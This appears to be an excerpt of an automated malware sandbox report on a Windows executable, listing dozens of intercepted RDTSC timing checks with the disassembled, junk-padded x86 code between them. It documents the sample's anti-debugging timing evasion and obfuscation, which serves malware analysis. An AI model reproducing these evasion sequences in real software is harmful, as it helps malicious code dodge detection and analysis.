              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4B16 second address: FA4B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4B1C second address: FA4B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F335931F146h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4B36 second address: FA4B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4B43 second address: FA4B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA4C83 second address: FA4C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5085 second address: FA5089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5089 second address: FA508D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA508D second address: FA5093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5093 second address: FA50A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBC1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA538A second address: FA538E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA584B second address: FA58B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F335854CBB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c jg 00007F335854CBB8h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 xchg eax, ebx 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F335854CBB8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 nop 0x00000031 pushad 0x00000032 jg 00007F335854CBB8h 0x00000038 jno 00007F335854CBBCh 0x0000003e popad 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F335854CBC8h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA58B8 second address: FA58BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5B0E second address: FA5B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5C06 second address: FA5C10 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F335931F146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5C10 second address: FA5C15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5DE6 second address: FA5DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F155h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5DFF second address: FA5E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA5E03 second address: FA5E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 cmc 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA629E second address: FA62B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBC6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA62B8 second address: FA6333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F335931F148h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov esi, dword ptr [ebp+122D2706h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F335931F148h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+12465100h] 0x00000052 push eax 0x00000053 jp 00007F335931F150h 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA6C6A second address: FA6C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7492 second address: FA74AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA74AD second address: FA74B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA89B2 second address: FA8A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F335931F148h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jng 00007F335931F14Ch 0x0000002d mov dword ptr [ebp+1244D3FAh], esi 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+1245A948h], edx 0x0000003b or si, 4B38h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F335931F148h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F335931F155h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA74B2 second address: FA74C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F335854CBBCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA74C6 second address: FA74CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAB4AA second address: FAB4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAB4BC second address: FAB4D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F335931F14Ch 0x00000011 jne 00007F335931F146h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAF483 second address: FAF492 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAF492 second address: FAF496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAF496 second address: FAF49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAB237 second address: FAB241 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F335931F146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F6496E second address: F64974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F64974 second address: F64981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F335931F146h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAB241 second address: FAB25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBC5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB3B40 second address: FB3B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F156h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB4AFD second address: FB4B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FABCCC second address: FABCD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FABCD2 second address: FABCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB5CB1 second address: FB5D4C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F335931F14Ch 0x00000008 jg 00007F335931F146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F335931F148h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov dword ptr [ebp+1245A75Bh], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F335931F148h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov ebx, ecx 0x00000053 xchg eax, esi 0x00000054 je 00007F335931F15Ch 0x0000005a jmp 00007F335931F156h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 jnp 00007F335931F146h 0x00000069 jmp 00007F335931F154h 0x0000006e popad 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB7D44 second address: FB7D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB7D49 second address: FB7DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F159h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f and ebx, dword ptr [ebp+122D3BC8h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F335931F148h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov ebx, dword ptr [ebp+122D3A50h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F335931F148h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov bh, 16h 0x00000055 sub ebx, 3627D297h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jns 00007F335931F14Ch 0x00000064 jg 00007F335931F146h 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAF687 second address: FAF729 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F335854CBC8h 0x0000000c jnp 00007F335854CBB6h 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 push edx 0x00000018 jmp 00007F335854CBBBh 0x0000001d pop edi 0x0000001e add dword ptr [ebp+122DB936h], ecx 0x00000024 push dword ptr fs:[00000000h] 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F335854CBB8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+122D2D0Bh] 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 mov bh, 50h 0x00000054 mov dword ptr [ebp+122DB996h], eax 0x0000005a mov eax, dword ptr [ebp+122D0BB5h] 0x00000060 add edi, 4E64AF66h 0x00000066 push FFFFFFFFh 0x00000068 sub dword ptr [ebp+1244DC41h], eax 0x0000006e nop 0x0000006f pushad 0x00000070 push ecx 0x00000071 jo 00007F335854CBB6h 0x00000077 pop ecx 0x00000078 push eax 0x00000079 push edx 0x0000007a js 00007F335854CBB6h 0x00000080 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB8E60 second address: FB8E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F153h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB8E77 second address: FB8ECC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a jnp 00007F335854CBB8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ecx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F335854CBB8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12471909h], edi 0x00000036 push 00000000h 0x00000038 mov edi, eax 0x0000003a xchg eax, esi 0x0000003b jng 00007F335854CBC1h 0x00000041 jmp 00007F335854CBBBh 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB06D0 second address: FB06D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB2DC8 second address: FB2DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB2DCC second address: FB2DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F335931F157h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB7F17 second address: FB7F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBAFF9 second address: FBB00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F335931F146h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007F335931F14Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBC015 second address: FBC01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBC01A second address: FBC090 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F335931F148h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F335931F148h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 cld 0x0000002a push 00000000h 0x0000002c call 00007F335931F155h 0x00000031 mov ebx, esi 0x00000033 pop edi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F335931F148h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push edi 0x00000053 pushad 0x00000054 popad 0x00000055 pop edi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBC090 second address: FBC096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB904E second address: FB9058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB9058 second address: FB90BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f clc 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, 5C53BB6Fh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov ebx, 1845787Ah 0x00000028 mov eax, dword ptr [ebp+122D093Dh] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F335854CBB8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 sub dword ptr [ebp+1245A413h], ebx 0x0000004e mov edi, dword ptr [ebp+1246D8F8h] 0x00000054 push FFFFFFFFh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jc 00007F335854CBBCh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB90BF second address: FB90C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBB1B6 second address: FBB1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBB1C7 second address: FBB1E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBB1E9 second address: FBB1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBE080 second address: FBE0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F335931F148h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 pushad 0x00000023 xor dword ptr [ebp+122D1DD9h], ebx 0x00000029 push ecx 0x0000002a movsx ecx, cx 0x0000002d pop ecx 0x0000002e popad 0x0000002f push 00000000h 0x00000031 movsx ebx, dx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F335931F148h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 cld 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F335931F157h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBD23F second address: FBD250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335854CBBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF149 second address: FBF14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF14D second address: FBF153 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF153 second address: FBF17D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F335931F14Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335931F157h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF17D second address: FBF182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF314 second address: FBF380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F335931F14Ah 0x0000000f and bx, 6C12h 0x00000014 pop edi 0x00000015 push dword ptr fs:[00000000h] 0x0000001c sub edi, dword ptr [ebp+122D2C71h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F335931F148h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D0BADh] 0x00000049 or dword ptr [ebp+122D1D5Dh], edi 0x0000004f push FFFFFFFFh 0x00000051 mov ebx, dword ptr [ebp+122D27C9h] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
